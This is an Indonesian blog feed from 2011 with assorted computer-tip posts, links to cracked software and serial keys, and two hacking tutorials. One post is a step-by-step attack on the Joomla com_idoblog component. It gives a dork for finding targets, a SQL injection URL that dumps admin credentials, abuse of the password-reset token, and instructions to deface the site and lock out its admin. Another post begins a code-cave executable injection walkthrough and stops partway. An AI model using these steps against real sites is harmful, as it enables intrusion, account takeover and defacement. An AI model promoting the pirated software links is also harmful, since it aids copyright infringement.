tag:blogger.com,1999:blog-17565506005886109832024-03-06T12:30:27.217+07:00ICHANK ALBERTichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.comBlogger38125tag:blogger.com,1999:blog-1756550600588610983.post-85427203512010008042011-05-23T06:36:00.000+07:002011-05-23T06:36:33.954+07:00Menampilkan entri terbaru dengan label MEMPERCANTIK FLASHDISK. Tampilkan entri lawas<a href="http://indonesia-blogger.com"><img src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" border="0"/></a>Memberi Icon Pada Flasdisk<br />
Memberi Icon Pada Flashdisk<br />
Buka Notepad Lalu Copy-Paste code berikut<br />
<br />
[autorun]<br />
icon=dede.ico<br />
<br />
dede.ico adalah nama icon yang ada di flashdisk saya. Ganti dede.ico dengan icon anda<br />
<br />
simpan dengan nama autorun.inf<br />
Caranya klik File > Save As… > autorun.inf trus klik Save<br />
Simpan autorun.inf dan icon yang akan anda gunakan ke dalam Flasdisk<br />
<br />
Dengan member icon pada flasdisk kita dapat mengetahui apakah flasdisk kita terkena virus atau tidak. Apabila icon tidak tampil pada saat flasdisk di pasang kemungkinan flasdisk kita terkena virus. Karena autorun.inf yang ada pada flasdisk telah di ambil alih oleh virus tersebut. Kebanyakan virus memakai autorun.inf tersebut untuk menjalankan dirinya secara otomatis.Jadi apabila saat anda memasang flasdisk ke komputer icon nya tidak muncul, ada kemungkinan flasdisk anda terkena virus......<br />
<br />
untuk membuat icon kita bisa menggunakan software Axialis IconWorkshop.<br />
Silahkan klik dibawah ini:<br />
<br />
Download Axialis Icon<br />
<br />
Untuk mempercepat download gunakan IDM yang bisa di download DiSini<br />
<br />
tags : mempercantik flasdisk, memberi gambar flasdik, flasdik cantik, flasdisk bagus, icon flasdisk, gambar flasdisk.ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-60211046890661368562011-05-23T06:32:00.000+07:002011-05-23T06:32:47.975+07:00Mau Traffic/Kunjungan Blog anda 100 - 1000 lebih Visitor per Hari ?<a href="http://indonesia-blogger.com"><img src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" border="0"/></a>Mau Traffic/Kunjungan Blog anda 100 - 1000 lebih Visitor per Hari ?<br />
tags: cara meningkatkan traffic, kunjungan blog web, traffic tinggi, visitor banyak 100-1000<br />
Pengen traffic atau kunjungan blog anda lebih dari 100/1000 visitor/hari tanpa anda harus capek-capek blogwalking atau melakukan tarffic exchange. Jika di PTC atau Jasa lainnya 500 visitor dihargai 30-40rb dan di PPC minimal 400rb, . Maka Dengan saya hanya 10rb/hari anda akan mendapatkan traffic/kunjungan blog anda:<br />
<br />
- Unik visitor antara 100-1000 /hari<br />
- Pageview 500-2500 /hari<br />
- Backlink dari blog ini dan beberapa blog yg Pagerank nya 2-4<br />
<br />
hanya dengan 10rb/hari kamu bisa mendapatkan 100-1000 visitor /hari + Bantuan untuk melangsingkan alexa anda (jika 5 hari/lebih) dari puluhan juta menjadi di bawah 10jt.<br />
<br />
Syaratnya Blog/web anda harus terpasang histats untuk mengetahui jumlah Visitor dan PageView Blog anda.<br />
Jika anda tidak percaya anda bisa mencoba untuk 1 hari dengan Rp. 10.000 dan anda bisa melihat hasilnya dari histats yang anda pasang....<br />
<br />
Anda bisa memilih link mana yang ingin anda tampilkan. Jika berminat silahkan sms ke 081346370918 atau bisa kirim email ke dede_purnama@ymail.com<br />
<br />
Bagi anda yang ingin memsang banner di blog ini berikut daftar hargannya:<br />
<br />
- 300x250 harga Rp. 50.000/bulan<br />
- 300x60 harga Rp. 20.000/bulan<br />
- 125x125 harga Rp. 10.000/bulan<br />
<br />
yang berminat silahkan sms dan kirim banner anda lewat email...<br />
<a href="http://ichankyakan.blogspot.com">http://ichankyakan.blogspot.com</a>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-67742560837230252011-05-23T06:28:00.002+07:002011-05-23T06:28:23.328+07:00Cara Memperbaiki Windows Tidak Mau Booting (Registry error)<a href="http://indonesia-blogger.com"><img src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" border="0"/></a>Cara Memperbaiki Windows Tidak Mau Booting (Registry error)<br />
Komputer yang kita gunakan mungkin pernah mengalami kerusakan sistem (registry) sehingga tidak mau booting atau masuk ke windows. Kerusakan registry ini bisa terjadi karena banyak hal, seperti karena konflik software yang di install, komputer mati mendadak, virus dan sebagainya. Apa tandanya kerusakan registry dan bagaimana mengatasi jika hal ini terjadi ?<br />
<br />
Yang pertama perlu diperhatikan adalah membaca apa pesan error atau peringatan (warning) ketika komputer bermasalah. Jika perlu, tulis apa tampilan terakhir atau pesan yang muncul di layar monitor (yang bisa kita gunakan untuk mencari solusi dari internet). Tidak semua error karena kerusakan registry windows. Kerusakan Registry windows biasanya ditandai dengan munculnya pesan seperti berikut :<br />
<br />
* Windows could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SYSTEM atau \WINDOWS\SYSTEM32\CONFIG\SOFTWARE, atau \WINDOWS\SYSTEM32\ saja dan sejenisnya<br />
* Stop: c0000218 {Registry File Failure} The registry cannot load the hive (file): \SystemRoot\System32\Config\SOFTWARE or its log or alternate<br />
* System error: Lsass.exe<br />
When trying to update a password the return status indicates that the value provided as the current password is not correct.<br />
<br />
Selain contoh pesan error diatas, mungkin masih banyak pesan sejenis yang ditampilkan ketika sistem/registry windows mengalami kerusakan. Jika komputer ketika booting atau restart hanya behenti di pesan error seperti diatas, maka bisa dicoba langkah mudah berikut:<br />
<br />
1. Restart Windows<br />
2. Kemudian tekan-tekan tombol F8 sampai muncul tampilan seperti berikut :<br />
Untuk Windows 7 : Repair Your Computer<br />
<br />
3. Dari pilihan yang ada, pilih Last Known Good Configuration (untuk windows XP ada ketarangan dalam kurungnya: your most recent setting that worked)<br />
4. Jika berjalan lancar seharusnya bisa kembali masuk ke windows<br />
<br />
Setelah langkah diatas, mungkin ada beberapa program atau software yang belum lama di install tidak bisa berjalan sempurna. Hal ini karena bisa jadi backup data registry windows belum menyimpan konfigurasi software yang di install ini, sehingga software tersebut perlu di install ulang.<br />
<br />
Jika langkah diatas tidak berhasil, maka mungkin harus dilakukan dengan langkah manual. Intinya adalah mengganti file-file registry windows yang rusak. File-file registry windows ini ada di lokasi c:\windows\system32\config, filenya adalah :<br />
<br />
* system<br />
* software<br />
* sam<br />
* security<br />
* default<br />
<br />
File-file backup registry ini biasanya ada di folder C:\WINDOWS\repair. Untuk mengganti file-file diatas, bisa menggunakan bootable CD/flashdisk atau manual menggunakan windows repair, langkahnya bisa dilihat selengkapnya di support.microsoft.com<br />
<br />
sumber: ebsoftichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-38653246334361358842011-05-23T06:25:00.000+07:002011-05-23T06:25:32.527+07:00Windows 7 Error BAD_POOL_HEADER<a href="http://indonesia-blogger.com"><img src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" border="0"/></a><br />
Windows 7 Error BAD_POOL_HEADER<br />
tags: layar windows 7 biru, kerusakan windows 7, cara memperbaiki windows 7, windows 7 error hang restar<br />
Layar biru BAD_POOL_HEADER biru dapat terjadi ketika Windows 7 gagal untuk mengalokasikan memori dengan benar. Seperti kebanyakan error, ada banyak kemungkinan penyebab sehingga Anda akan perlu melakukan beberapa diagnosa untuk mempersempit masalah.<br />
<br />
Penyebab umum kesalahan ini adalah:<br />
<br />
1. Adanya bugs dalam sistem driver<br />
2. Masalah Anti-virus<br />
<br />
Langkah pertama dalam pemecahan masalah pertama adalah harus memperbarui semua driver sistem Anda, terutama untuk yang digunakan chipset anda pada pengontrol SATA (penyebab ini yang paling sering terjadi). Jika Anda tidak yakin dengan driver chipset yang Anda butuhkan, silahkan posting di forum-forum komputer atau mencari jawabannya melalui gugling. Selain driver Anda juga harus memastikan bahwa sistem Anda sepenuhnya diperbarui dengan service pack terbaru (melalui Windows Update).<br />
<br />
Jika kesalahan BSOD (blue screen of death) ini bertahan, Anda dapat mengembalikan instalasi Windows Anda kembali ke titik sebelumnya dengan menggunakan System Restore. Anda juga dapat menggunakan crash dump untuk menemukan rincian lebih lanjut tentang error ini, yang memungkinkan Anda untuk menentukan file bermasalah. File dump terletak di C:WindowsMinidump. Penjelasan mengenai minidump adapat and abaca di sini; http://msdn.microsoft.com/en-us/library/ms680369%28v=vs.85%29.aspx<br />
<br />
Jika ternyata proses diatas tidak menyelesaikan masalah maka kemungkinan kedua adalah karena virus. Mengenai virus ini memang sangat rumit karena selain menyebabkan layar biru virus juga dapat menyebabkan banyak masalah lain, misalnya komputer restart sendiri atau computer malah tidak bisa masuk windows.<br />
<br />
Untuk penyelesaiannya juga sangat beragam tentang antivirus mana yang terbaik menurut anda.ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-32560976184690072622011-05-23T06:21:00.003+07:002011-05-23T06:21:36.101+07:00<a href="http://indonesia-blogger.com"><img src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" border="0"/></a>Cara Mengatasi Komputer/Laptop Lambat<br />
tags: cara agar komputer cepat, memperbaiki komputer lambat, mempercepat laptop<br />
Komputer atau laptop sangat lambat/lelet? tidak seperti saat pertama di beli. Hampir setiap orang pasti pernah mengalami keadaan seperti ini. Mungkin ini adalah hal lama, tapi apakah anda sudah tau cara mengatasinya? Jika belum silahkan tips berikut ini. Untuk mengetahui mengapa komputer bekerja lambat, lemot, berat, maka kita perlu tahu program-program yang menggunakan memori yang besar. Cara mengeceknya dengan ‘Task Manager’.<br />
<br />
Ctrl+Alt+Del >> Task Manager >> tab “Process”<br />
<br />
Di sini dapat terlihat aplikasi yang memakan memori. Silahkan di-close/end process program-program yang tidak diperlukan. Bersihkan harddisk dengan antivirus terupdate. Gunakan antivirus yang lokal maupun interlokal.<br />
<br />
Matikan Start-Up Application. StartUp Application adalah program-program yang berjalan otomatis ketika kita mulai menjalankan Windows. Cara untuk mematikannya:<br />
<br />
“Start” >> “Program” >> “Startup”<br />
<br />
Lalu Delete semua icon yang ada di folder StartUp. Ada banyak start-up program lain yang mungkin tidak terdeteksi di folder start-up. Untuk mematikan program-program ini, bisa memakai program bernama “Whats Running”. Cara menggunakannya ialah:<br />
<br />
Jalankan aplikasi What’s Running >> Tab “Startup” >> uncheck semuanya<br />
<br />
Untuk Windows 7:<br />
<br />
Control Panel >> Performance Information & Tools (manfaatkan fitur search)>> Adjust Visual Effects<br />
<br />
Di tab “Visual Effects”, pilih “Adjust for best performance”. Atau di list yang terdapat di bagian bawah, silahkan uncheck tampilan visual yang tidak diperlukan. Karena semakin banyak yang di-check, maka semakin banyak memori yang digunakan.<br />
<br />
gunakan program “TuneUp Utilities”. Program ini dapat menyelesaikan almost semua masalah penyebab komputer lambat (termasuk menggunakan solusi-solusi #1 – #4). Aktifkan Turbo Mode agar kompi bekerja dengan lebih cepat.<br />
<br />
gunakan program bernama CCleaner. Program ini berfungsi menghapus data-data yang “kurang” diperlukan yang biasanya memakan memori komputer. Seperti temporary files, unused icons, permasalahan registry, cache, cookies, dll.<br />
<br />
Selamat mencoba...<br />
You might also like:<br />
Tips Memproteksi Diri dari Ancaman Cyber<br />
Tips Membuat Irit Konsumsi Baterai Laptop<br />
Penyebab Komputer Menjadi Lambat dan Solusinya<br />
Cara Membuat Password Yang Aman<br />
Cara Mempercepat Browser Opera<br />
LinkWithin<br />
Label: PERBAIKAN KOMPUTER, TIPS dan TRIK KOMPUTER/INTERNETichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com1tag:blogger.com,1999:blog-1756550600588610983.post-56076087189601214622011-05-23T06:19:00.000+07:002011-05-23T06:19:14.651+07:00Internet Download Accelerator 5.10 Software Mempercepat Download Selain IDMInternet Download Accelerator 5.10 Software Mempercepat Download Selain IDM<br />
tags: download cepat, mempercepat download, pengganti idm, untuk download video musik file<br />
Internet Download Accelerator adalah apliksai/software yang sama seperti internet download manager (IDM) yang berfungsi untuk meningkatkan kecepatan download file dari Internet menggunakan HTTP, HTTPS dan protokol FTP. Percepatan dicapai dengan memisahkan file yang didownload menjadi beberapa bagian dan men-download bagian-bagian pada waktu yang sama. Internet Download Accelerator bisa meresume download yang terputus sehingga tidak perlung mengulang dari awal. Untuk meningkatkan kegunaan Internet Download Accelerator terintegrasi dengan Internet Explorer, Mozilla Firefox, Opera, Nescape dan lain-lain. Selain itu, program monitor clipboard sistem dan mendeteksi URL di clipboard. Dengan IDA Anda dapat men-download dan menyimpan video dari layanan video populer: YouTube, Google Video, Metacafe dan lain-lain. Apapun jenis koneksi Anda, Internet Download Accelerator akan menggunakan bandwidth dari koneksi Anda yang paling efektif dan men-download file sangat cepat.<br />
<br />
Sama seperti IDM, IDA juga deteksi file otomatis dengan penempatan file otomatis ke kategori tertentu. Versi baru IDA memiliki kemampuan untuk men-download video dari layanan berbagi video populer dan untuk melihat dan bermain streaming video dengan built-in player. Peningkatan pop-up akan menampilkan informasi rinci tentang kesalahan download dan bagaimana cara untuk memperbaikinya sehingga bisa melakukan download hingga selesai. Peningkatan integrasi dengan Mozilla Firefox dan Opera akan membuat lebih mudah bagi pengguna browser yang populer.<br />
<br />
Klik dibawah ini untuk mendapatkannya...<br />
<br />
Download IDA + Keyichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-9860283907197241762011-05-23T06:13:00.000+07:002011-05-23T06:13:35.245+07:00TuneUp Utilities 2011 Full Version + Serial Number<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<span class="widget-item-control"> </span> <a href="" name="1883398913300126977"></a> <h3 class="post-title entry-title"> <a href="http://dedepurnama.blogspot.com/2010/10/tuneup-utilities-2011-full-version.html">TuneUp Utilities 2011 Full Version + Serial Number</a> </h3><span class="Apple-style-span" style="font-size: 78%;">serial number key TuneUp Utilities 2011, download TuneUp Utilities 2011 terbaru, key valid TuneUp</span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiPl8TDx8ygm8dw5bXhvQolQ9pFSqa68wYhTFFG8-Dw3fmeh6TqnfwYhSO3nSuXMYsxco81S9FNALR660BiPPM-gcyVSSrMja8OKbUzl6Cxzi3_HVoKY2x5yseavOgY1CzxBmNIXE-RiSx/s1600/Tuneup+utilities+2011.jpg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534066263261833474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiPl8TDx8ygm8dw5bXhvQolQ9pFSqa68wYhTFFG8-Dw3fmeh6TqnfwYhSO3nSuXMYsxco81S9FNALR660BiPPM-gcyVSSrMja8OKbUzl6Cxzi3_HVoKY2x5yseavOgY1CzxBmNIXE-RiSx/s320/Tuneup+utilities+2011.jpg" style="cursor: pointer; float: left; height: 144px; margin: 0pt 10px 10px 0pt; width: 209px;" /></a><span style="font-weight: bold;">TuneUp Utilities 2011</span> adalah software untuk mengoptimalkan kinerja Komputer atau Laptop. TuneUp Utilities dapat membuat sistem operasi Windows lebih cepat, lebih nyaman dan lebih aman hanya dengan beberapa klik. Dan semua operasi yang dilakukan pada sistem operasi benar-benar aman, karena semua perubahan yang dipantau oleh TuneUp Rescue Center dan dapat dibatalkan kapan saja.<br />
<span class="fullpost"><br />
Semua kerja TuneUp Utilities dapat diakses melalui interface umum yang terbagi menjadi enam kategori. Perangkat lunak ini sangat membantu baik bagi pemula maupun yang ahli untuk membuat Windows memenuhi kebutuhan mereka dengan cara yang lebih baik, lebih mudah dan aman. Semua sistem penting dijelaskan dengan cara yang mudah dan dapat diaktifkan atau dinonaktifkan dengan klik dari mouse anda. TuneUp Utilities akan membuat perubahan yang diperlukan dalam registri atau file boot secara otomatis.<br />
<br />
TuneUp Utilities secara otomatis menjalankan tugas-tugas pemeliharaan Komputer/Laptop Anda, membuat Anda mengetahui setiap masalah dan menawarkan solusi sederhana. Hal ini menjamin kinerja selalu yang terbaik. Sebuah komputer yang lambat dan berantakan adalah masa lalu untuk Anda. Anda juga dapat menggunakan TuneUp Utilities untuk menyesuaikan tampilan sistem Windows Anda. Klik dibawah ini untuk mendapatkan TuneUp Utilities 2011<br />
<br />
<a href="http://adf.ly/NCjv" target="_blank">Download TuneUp Utilities 2011</a><br />
<a href="http://adf.ly/NWjP" target="_blank">Serial Number TuneUp Utilities 2011</a><br />
<br />
Catatan: TuneUp Utilities 2011 nya jangan di update. klo di update dia akan minta key baru.<br />
Untuk mempercepat download gunakan IDM yang bisa di download <a href="http://dedepurnama.blogspot.com/2010/09/download-idm-602-patch-full-version.html" target="_blank" title="Download">DiSini</a><br />
<br />
Jika Muncul Adf.ly klik SKIP AD untuk mendownload filenya<br />
<a href="http://dedepurnama.blogspot.com/2010/10/tuneup-utilities-2011-full-version.html"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5566705539412915954" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7BXHIILAWqp1OJrnyGCltxVPr2Q31sM02kmqlasXCvqqtDs8Ui5wIAUdy1qpvdHX9dSP6TuJ8p1Lear_sCz9p9pjULbDgBr8GbGFiGN58vnZg22WMGczxTgQxXnR7XPg27lUBB-FkhLYl/s400/adf.ly.jpg" style="cursor: pointer; display: block; height: 103px; margin: 0px auto 10px; text-align: center; width: 575px;" /></a><a href="http://ichankyakan.blogspot.com/" target="_blank">http://ichankyakan.blogspot.com</a></span></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-20991004238576679492011-05-23T03:46:00.000+07:002011-05-23T03:46:45.522+07:00Hacking Administrator Joomla Com_Idoblog<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<h1>Hacking Administrator Joomla Com_Idoblog</h1><div><strong>Hacking Administrator Joomla – Get Full Access</strong>!</div><div><strong>Tools required:</strong><br />
SQL-i Knowledge<br />
reiluke SQLiHelper 2.7<br />
Joomla! Query Knowledge</div><div>Finding Exploit And Target</div><div><strong>Those two steps could go in different order, depend what you find first target or exploit…</strong></div><div><strong>Google dork: inurl:”option=com_idoblog”</strong></div><div><strong>Comes up with results for about 140,000 pages</strong></div><div><strong><img alt="[Image: 001cv.png]" border="0" src="http://img838.imageshack.us/img838/300/001cv.png" /></strong></div><div><strong>At inj3ct0r.com search for: com_idoblog</strong></div><div><strong>Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln</strong></div><div><strong><img alt="[Image: 002rg.png]" border="0" src="http://img836.imageshack.us/img836/1907/002rg.png" /></strong></div><div><strong>==</strong></div><div><strong>Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln</strong></div><div><strong>==</strong></div><div><strong>index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users–</strong></div><div><strong>Exploit can be separated in two parts:</strong></div><div><strong>Part I</strong></div><div><strong>index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62</strong></div><div><strong>This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)</strong></div><div><strong>Part II</strong></div><div><strong>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–</strong></div><div><strong>This part looking for username and password from jos_users table</strong></div><div>Testing Vulnerability</div><div><strong>Disable images for faster page loading:</strong></div><div><strong>[Firefox]</strong></div><div><strong>Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’</strong></div><div><strong>Go to:</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22</code></div></div><div><strong>Site load normally…</strong></div><div><strong>Go to:</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62</code></div></div><div><strong>Site content blog Profile Admin</strong></div><div><strong>Go to:</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--</code></div></div><div><strong>Site is vulnerable</strong></div><div>Inject Target</div><div><strong>Open reiluke SQLiHelper 2.7</strong></div><div><strong>In Target copy</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62</code></div></div><div><strong>and click on Inject</strong></div><div><strong>Follow standard steps until you find Column Name, as a result we have </strong></div><div><strong><img alt="[Image: 003bd.png]" border="0" height="285" src="http://img834.imageshack.us/img834/7643/003bd.png" width="640" /></strong></div><div><strong>Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see</strong></div><div><strong>our target use jos153_users table for storing data</strong></div><div><strong>Let Dump username, email, password from Column Name jos153_users. Click on Dump Now</strong></div><div><strong><img alt="[Image: 004k.png]" border="0" height="143" src="http://img217.imageshack.us/img217/3421/004k.png" width="640" /></strong></div><div><strong>username: admin</strong></div><div><strong>email: info@site.com</strong></div><div><strong>password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI</strong></div><div><strong>Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a</strong></div><div><strong>32 character salt that is appended to the end of the password string. The password is stored as </strong></div><div><strong>{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…</strong></div><div><strong>The easiest way to hack is to reset Admin password!</strong></div><div>Admin Password Reset</div><div><strong>Go to:</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/index.php?option=com_user&view=reset</code></div></div><div><strong>This is standard Joomla! query for password reset request</strong></div><div><strong><img alt="[Image: 005hy.png]" border="0" height="218" src="http://img29.imageshack.us/img29/7562/005hy.png" width="640" /></strong></div><div><strong>Forgot your Password? page will load.</strong></div><div><strong>In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.</strong></div><div><strong>If you find right admin email, Confirm your account. page will load, asking for Token:</strong></div><div>Finding Token</div><div><strong>To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users</strong></div><div><strong><img alt="[Image: 006fj.png]" border="0" src="http://img691.imageshack.us/img691/1796/006fj.png" /></strong></div><div><strong>username: admin</strong></div><div><strong>activation: 5482dd177624761a290224270fa55f1d</strong></div><div><strong>5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.</strong></div><div><strong><img alt="[Image: 007pa.png]" border="0" src="http://img576.imageshack.us/img576/1710/007pa.png" /></strong></div><div><strong>If you done everything ok, Rest your Password page will load. Enter your new password…</strong></div><div><strong>After that go to:</strong></div><div> <div>Code:</div><div dir="ltr"><code>http://www.site.com/administrator/</code></div></div><div><strong>Standard Joomla portal content management system</strong></div><div><strong>Enter username admin and your password, click on Login</strong></div><div><strong>Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML</strong></div><div><strong>In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!</strong></div><div><strong><img alt="[Image: 008bo.png]" border="0" height="542" src="http://img291.imageshack.us/img291/8648/008bo.png" width="640" /></strong></div><div><strong>To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail</strong></div><div><strong><img alt="[Image: 009kw.png]" border="0" src="http://img707.imageshack.us/img707/8946/009kw.png" /></strong></div>Credit: MindFreak [HckGuide]</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-57497315552987453822011-05-23T03:39:00.000+07:002011-05-23T03:39:32.736+07:00Tutorial Injeksi Executable – MessageBox<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<h1>Tutorial Injeksi Executable – MessageBox</h1><span class="st_facebook_vcount"></span><span class="st_twitter_vcount"></span><span class="st_sharethis_vcount"></span><br />
<div style="text-align: justify;">Sebuah aplikasi executable pada Microsoft Windows seperti *.exe, *.dll, *.sys, dan lainnya meskipun<br />
memiliki fungsi berbeda antara satu dan lainnya namun tetap tergolong sebagai satu tipe yaitu <strong>Portable</strong><br />
<strong> Executable (PE)</strong>. Sebagai acuan Saya menyarankan Anda membaca buku karangan <em>Mat Pietrek “Peering</em><br />
<em> Inside the PE: A Tour of the Win32 Portable Executable File Format”</em> buku hebat yang membahas tentang<br />
Portable Executable. Saya sengaja tidak membahasnya disini, karena hanya akan menghabiskan banyak<br />
halaman yang akhirnya membuat mata Anda rusak dan harus memakai kacamata minus seperti Saya <img alt=":(" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_sad.gif" /> </div><div style="text-align: justify;">File tipe portable Executable tersebut memiliki resiko yang sangat tinggi terhadap berbagai<br />
kemungkinan manipulasi, baik oleh virus maupun hacker. Tidak ada satupun di dunia komputer yang<br />
benar-benar aman dari serangan hacker. <strong>Jika ada orang yang mengklaim bahwa dia bisa menjamin</strong><br />
<strong> keamanan sebuah aplikasi sampai 90%, berarti orang tersebut adalah orang gila sok tahu!</strong> <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;">Injeksi Executable hanya bisa dilakukan dengan Reverse Engineering, teknik Reverse Engineering sendiri<br />
merupakan dasar dari seluruh ilmu hacking. Baik hacking (atau lebih tepatnya Cracking:)) sederhana<br />
seperti mengubah tampilan website <em>(Deface atau Poisoning)</em>, mencuri data shopping online <em>(Carding)</em>,<br />
Serial fishing <em>(Shareware Cracking)</em> sampai dengan hacking tingkat advance <em>(733t)</em> seperti membuat<br />
worm, exploit atau shellcode dan lain sebagainya. Tanpa memiliki dasar Reverse Engineering, belum<br />
tepat jika seseorang mengklaim dirinya sebagai hacker ataupun cracker. Apalagi jika hanya meniru<br />
teknik orang lain. Semoga ini bisa menjawab semua pertanyaan dari teman-teman semua melalui email<br />
Saya tentang bagaimana cara menjadi hacker.</div><div style="text-align: justify;">Artikel ini Saya tulis untuk menggambarkan kepada Anda tentang proses injeksi executable.<br />
Pengkodean, pembahasan dan hal lainnya sengaja disederhanakan untuk memudahkan Anda dalam<br />
memahaminya. Maaf, Saya tidak membahas proses injeksi advance dan elit, karena pastinya terlalu<br />
membosankan bagi kebanyakan orang. Mengingat artikel ini ditujukan untuk semua kalangan pembaca.<br />
Alasan lainnya Saya bukanlah juru ketik dan selalu mengantuk saat mengetik dan menulis <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;">Beberapa hal yang perlu Anda persiapkan adalah :</div><ol style="text-align: justify;"><li>Debuger (Saya merekomendasikan Ollydbg, tool gratis dan powerful di http://www.ollydbg.de/) atau Hexa editor (jika Anda 733t hacker seperti orakanggo, tomero, +m03n+, Jowy, anak_tk, CodeMaker dan Apakekdah.. <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</li>
<li> Notepad atau teks editor yang Anda sukai.</li>
<li>Sedikit pengetahuan tentang Assembly</li>
<li>Target file executable (Untuk menghindari UU Copyright dan DMCA, Saya sudah menyertakan file target bersama artikel ini atau Anda bisa mendownloadnya di website Saya)</li>
<li>Palmall cigarettes, a cup of coffe and Cradle of Filth-Beyond Eleventh Hour.mp3 (Anti ngantuk <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</li>
</ol><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><strong>Step 1 :</strong><br />
Buka file target “Target.exe” dengan mempergunakan OllyDbg seperti pada Gambar 1.</div><div style="text-align: justify;"><img alt="" class="alignnone" height="289" src="http://farm6.static.flickr.com/5304/5621228413_393ef397e1_d.jpg" title="Olly DBG" width="400" /><br />
<strong> Gambar 1. OllyDbg load file</strong></div><div style="text-align: justify;"><strong>Step 2 :</strong><br />
Mencari “Code Cave” program. Code Cave terdiri dari 00 dan 90 yang terdapat pada ruang sebuah<br />
program. Kita bisa mempergunakan Code Cave sebagai tempat injeksi kode kita sendiri. Secara<br />
sederhana bisa dikatakan Code Cave semacam apartemen atau ruang yang tidak terpakai jadi kita bisa<br />
menempatinya dengan bebas dan gratis <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div><div style="text-align: justify;"><img alt="" class="alignnone" height="483" src="http://farm6.static.flickr.com/5308/5621816930_8e7d482180_d.jpg" title="Code Cave" width="500" /><br />
<strong> Gambar 2. Code Cave</strong></div><div style="text-align: justify;"><strong>Step 3 :</strong><br />
Blok dengan menggunakan cursor mouse pada area Code Cave sesuai dengan bytes yang dibutuhkan,<br />
klik kanan pilih Binary->Edit->OK</div><div style="text-align: justify;"><img alt="" class="alignnone" height="276" src="http://farm6.static.flickr.com/5026/5621229693_6ff9a7dcc5.jpg" title="Binary Edit" width="500" /><br />
<strong> Gambar 3. Binary Edit</strong></div><div style="text-align: justify;"><strong>Step 4 :</strong><br />
Membuat Caption Text. Masukkan karakter pada kolom ASCII, misal “YOU’VE GOT HACKED” tanpa tanda<br />
petik. Lalu tekan OK. Karakter yang Anda ketikkan tersebut akan diasumsikan sebagai bahasa Assembly<br />
